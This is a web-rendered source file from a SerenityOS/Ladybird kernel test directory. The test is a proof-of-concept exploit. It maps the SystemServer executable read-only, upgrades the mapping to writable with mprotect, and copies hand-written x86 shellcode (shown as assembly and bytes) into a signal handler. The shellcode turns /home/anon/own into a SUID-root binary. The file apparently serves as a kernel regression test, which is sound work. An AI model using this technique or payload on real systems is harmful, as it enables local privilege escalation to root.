We use cookies to ensure you get the best experience on our website
Home Verkennen Help
Registreren Inloggen
0ct0pu5
/
ladybird
1
0
Vork 0
Bestanden Issues 0 Pull-aanvragen 0 Wiki
Boom: fd0dbd1ebf
Aftakkingen Labels
ladybird
/
Tests
/
Kernel
/
mmap-write-into-running-programs-executable-file.cpp

mmap-write-into-running-programs-executable-file.cpp 1.7 KB
Geschiedenis Ruwe

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576 
  1. /*
    2. 

  2.  * Copyright (c) 2018-2020, the SerenityOS developers.
    3. 

  3.  *
    4. 

  4.  * SPDX-License-Identifier: BSD-2-Clause
    5. 

  5.  */
    6. 

  6. 

  7. #include <AK/Types.h>
    8. 

  8. #include <fcntl.h>
    9. 

  9. #include <stdio.h>
    10. 

  10. #include <string.h>
    11. 

  11. #include <sys/mman.h>
    12. 

  12. #include <unistd.h>
    13. 

  13. 

  14. int main()
    15. 

  15. {
    16. 

  16.     int fd = open("/bin/SystemServer", O_RDONLY);
    17. 

  17.     if (fd < 0) {
    18. 

  18.         perror("open");
    19. 

  19.         return 1;
    20. 

  20.     }
    21. 

  21.     u8* ptr = (u8*)mmap(nullptr, 16384, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);
    22. 

  22.     if (ptr == MAP_FAILED) {
    23. 

  23.         perror("mmap");
    24. 

  24.         return 1;
    25. 

  25.     }
    26. 

  26. 

  27.     if (mprotect(ptr, 16384, PROT_READ | PROT_WRITE) < 0) {
    28. 

  28.         perror("mprotect");
    29. 

  29.         return 1;
    30. 

  30.     }
    31. 

  31. 

  32.     /*
    33. 

  33.      *
    34. 

  34.      * This payload replaces the start of sigchld_handler in the /bin/SystemServer file.
    35. 

  35.      * It does two things:
    36. 

  36.      *
    37. 

  37.      * chown ("/home/anon/own", 0, 0);
    38. 

  38.      * chmod ("/home/anon/own", 04755);
    39. 

  39.      *
    40. 

  40.      * In other words, it turns "/home/anon/own" into a SUID-root executable! :^)
    41. 

  41.      *
    42. 

  42.      */
    43. 

  43. 

  44. #if 0
    45. 

  45.     [bits 32]
    46. 

  46.     [org 0x0804b111]
    47. 

  47.     jmp $+17
    48. 

  48.     path:
    49. 

  49.     db "/home/anon/own", 0
    50. 

  50.     mov eax, 79
    51. 

  51.     mov edx, path
    52. 

  52.     mov ecx, 0
    53. 

  53.     mov ebx, 0
    54. 

  54.     int 0x82
    55. 

  55.     mov eax, 67
    56. 

  56.     mov edx, path
    57. 

  57.     mov ecx, 15
    58. 

  58.     mov ebx, 2541
    59. 

  59.     int 0x82
    60. 

  60.     ret
    61. 

  61. #endif
    62. 

  62. 

  63.     const u8 payload[] = {
    64. 

  64.         0xeb, 0x0f, 0x2f, 0x68, 0x6f, 0x6d, 0x65, 0x2f, 0x61, 0x6e, 0x6f,
    65. 

  65.         0x6e, 0x2f, 0x6f, 0x77, 0x6e, 0x00, 0xb8, 0x4f, 0x00, 0x00, 0x00,
    66. 

  66.         0xba, 0x13, 0xb1, 0x04, 0x08, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xbb,
    67. 

  67.         0x00, 0x00, 0x00, 0x00, 0xcd, 0x82, 0xb8, 0x43, 0x00, 0x00, 0x00,
    68. 

  68.         0xba, 0x13, 0xb1, 0x04, 0x08, 0xb9, 0x0f, 0x00, 0x00, 0x00, 0xbb,
    69. 

  69.         0xed, 0x09, 0x00, 0x00, 0xcd, 0x82, 0xc3
    70. 

  70.     };
    71. 

  71. 

  72.     memcpy(&ptr[0x3111], payload, sizeof(payload));
    73. 

  73. 

  74.     printf("ok\n");
    75. 

  75.     return 0;
    76. 

  76. }
    77.

Contact | Legal | Takedown | Status
Self-hosted public services - About
NibbleSpot by 0ct0pu5